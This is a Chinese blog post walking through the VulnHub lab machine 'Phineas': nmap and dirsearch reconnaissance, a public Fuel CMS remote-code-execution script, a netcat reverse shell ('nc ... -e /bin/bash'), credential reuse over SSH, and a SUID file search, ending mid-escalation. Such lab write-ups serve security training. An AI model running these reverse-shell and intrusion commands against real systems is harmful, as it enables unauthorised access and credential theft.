VulnHub打靶记录——phineas

已于 2024-03-04 10:22:36 修改
阅读量484 收藏 8
点赞数 5
分类专栏: 靶场实战 文章标签: 内网渗透
于 2024-03-04 10:20:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43531669/article/details/136210983
版权

靶机下载地址:https://download.vulnhub.com/phineas/Phineas.ova

将靶机设置为NAT模式并启动。

主机发现&信息收集

nmap扫描本地网段

nmap -sn 192.168.17.0/24

在这里插入图片描述
133就是我们的目标靶机。

接着收集靶场信息:

nmap -sV -Pn -O 192.168.17.133

在这里插入图片描述
开放端口22,80,111,3306

直接访问80端口,发现无法访问,dirsearch默认字典也没扫出什么东西,使用 kali 自带的字典跑一下

dirsearch.py -u http://192.168.17.133 -e* -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

只发现 structure 目录,但还是访问不了,继续深度扫描查看 robots.txt文件,说明存在fuel目录
在这里插入图片描述
访问:http://192.168.17.133/structure/fuel/
跳转到:http://192.168.17.133/structure/fuel/start
在这里插入图片描述
再次对 /structure/fuel 进行深度扫描,发现目录
在这里插入图片描述
在此处猜测,有一个系统叫做fuel,只不过现在还没发现入口
在这里插入图片描述
本地搜索一下 fuel,发现是CMS,后面几个SQL 注入需要先登录
在这里插入图片描述
试一下第一个 RCE 脚本
在这里插入图片描述
保存到本地,修改一下脚本:
在这里插入图片描述
更改47138.py文件的 url 和删除代理
在这里插入图片描述
执行一下发现还是不行
在这里插入图片描述
估计是路径不对,把所有 /structure 后都加上 /fuel 看下

在访问 /structure/index.php/fuel/ 路径的时候发现了 fuel cms 登录界面
在这里插入图片描述
再次修改脚本中 URL 路径并执行
在这里插入图片描述
成功执行
在这里插入图片描述

nc反弹shell

目标靶机已安装 NC
在这里插入图片描述
攻击机:

nc -nlvp 4444

cmd:nc 192.168.17.133 4444 -e /bin/bash

用靶机的bash进行操作,把本机的bash推回来
在这里插入图片描述
反弹成功

查看配置文件,看有没有能登录的账号

在这里插入图片描述
开放了22端口,使用ssh链接,输入刚才保存的数据库的密码,发现可以进入
在这里插入图片描述
看有无管理员权限,发现无

sudo -l

sudo -l 列出目前用户可执行与无法执行的指令。

在这里插入图片描述
查找有 suid 属性权限的文件

find / -perm -u=s -type f 2>/dev/null


find / -perm /4000 -type f 2>/dev/null
未完成的歌~
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场PHINEAS: 1实战记录
aoke79的博客
08-09 1397
vulnhub靶场PHINEAS: 1实战记录
HTB靶场系列 Windows靶机 Slio靶机
m0_57221101的博客
01-27 3303
这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识 勘探 nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0
Vulnhub Phineas靶场
一纸荒芜的博客
05-10 1354
Vulnhub Phineas靶场渗透
Vulnhub_Phineas
weixin_63960760的博客
08-21 116
因为靶场使用Vm8网卡,所以在Vm8网段中搜索存活主机得到在此网段中存活的主机,筛选后得到靶场的IP地址为192.168.175.131。
Vulnhub入门实战1-DC:1
qq_24033605的博客
06-09 719
Vulnhub入门实战1-DC:1 DC:1下载链接 (我这里使用的是vm,渗透工具使用的是kali2019) 下载得到的ova文件直接使用vm导入即可。 这里我使用的是桥接模式。 靶机进入登录页面就算开启了。 1.使用arp探索存活主机,找到靶机的ip地址。 找到靶机的ip地址为192.168.199.179 2.使用nmap进行端口扫描(信息收集)。 参数说明: -sV:版本探测 -p-:扫描全部端口 根据扫描结果开启了22,80,111,可以进行页面访问。 百度了一下drupal,发现dru
Linux日常——端口
haitang_yue的博客
06-19 521
引入端口的原因 在Internet上,各主机间通过TCP/IP协议发送和接收数据包,各个数据包根据其目的主机的ip地址来进行互联网络中的路由选择,把数据包顺利的传送到目的主机。大多数操作系统都支持多程序(进程)同时运行,那么目的主机应该把接收到的数据包传送给众多同时运行的进程中的哪一个呢?显然这个问题有待解决,端口机制便由此被引入进来。端口的分类 软件端口:在协议栈层间抽象的协议端口,它是各种协
vulnhub靶机Phineas
m0_73248913的博客
12-10 536
vulnhub靶机
Phineas:L10n仪表板
05-25
"Phineas:L10n仪表板"是一个用于项目管理和本地化工作的开源工具。这个工具主要设计用于帮助团队高效地管理全球化(Globalization)和本地化(Localization,简称L10n)流程,确保软件、网站或其他数字产品的内容...
Phineas and Ferb Wallpapers New Tab-crx插件
04-06
如果您是,我们的Phineas and Ferb扩展程序将非常适合您,因为它提供了不同的背景,每次您打开它时都会显示出来。 它带有各种高品质的壁纸,这将使您的浏览器超级有趣且丰富多彩。 除此之外,我们还添加了一些其他...
phineas-pta:我的GitHub个人资料的配置文件
03-07
:waving_hand: 嗨,我是@ phineas-pta :eyes: 我对......感兴趣 ... :seedling: 我目前正在学习... :revolving_hearts: 我正在寻求合作... :closed_mailbox_with_raised_flag: 如何到达我...
菲尼亚斯和小费标签「Phineas and Ferb Tab」-crx插件
03-12
您将在每个新选项卡中打开Phineas and Ferb HD图像! 惊人的! ==每个新标签页中的真棒高品质飞哥和Ferb图像。 ==对于真正的粉丝,就像我一样:)您会受到很大启发,并且会喜欢这个不错的扩展。 ==安装“ Phineas和...
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
[毕设]Delphi题库管理与试卷自动生成系统.zip
07-27
[毕设]Delphi题库管理与试卷自动生成系统
131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+图像识别与定位+该数据集相关的研究论文
07-27
<项目介绍> 包含131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+该数据集相关的研究论文。可供深度学习图像识别与定位。 - 训练集大小:67700 个图像 测试集大小:22888 个图像 文件名格式:image_index_100.jpg(例如 32_100.jpg)或 r_image_index_100.jpg(例如 r_32_100.jpg)或 r2_image_index_100.jpg 或 r3_image_index_100.jpg。 “r”代表旋转水果。 “r2”表示水果绕第三轴旋转。 “100”来自图像尺寸(100x100 像素)。 水果是如何拍摄的: 1:使用 C920 摄像机拍摄水果。最好的网络摄像头之一。 2:在水果后面,我们放了一张白纸作为背景。 3:将水果和蔬菜种植在低速电机(3转/分钟)的轴中,并录制一段20秒的短片。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
Matlab实现斑点鬣狗优化算法SHO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测.rar
07-27
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
[毕设]HTTP服务器开发与设计.zip
最新发布
07-27
[毕设]HTTP服务器开发与设计
Delphi简介+demo程序
07-27
Delphi 是一种由 Embarcadero Technologies(原 Borland 公司)开发的编程语言和环境,它基于 Object Pascal 语言,并提供了丰富的类库和可视化的集成开发环境(IDE)。Delphi 特别适合于开发 Windows 桌面应用程序,同时也支持其他操作系统如 macOS、iOS 和 Android(通过 FireMonkey 框架)。 下面是一个简单的 Delphi Demo 程序,该程序将创建一个窗口,并在窗口中添加一个按钮。点击按钮时,会在窗口底部显示一条消息。
inator是什么意思
08-07
例如,在动画电视节目“Phineas和Ferb”中,角色经常发明具有名称的新小工具,例如“Shrink-inator”或“Time-Travelinator”。后缀的意思是表明该机器或设备具有极高的效率或功率,能够执行特定的任务。 ### 回答...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值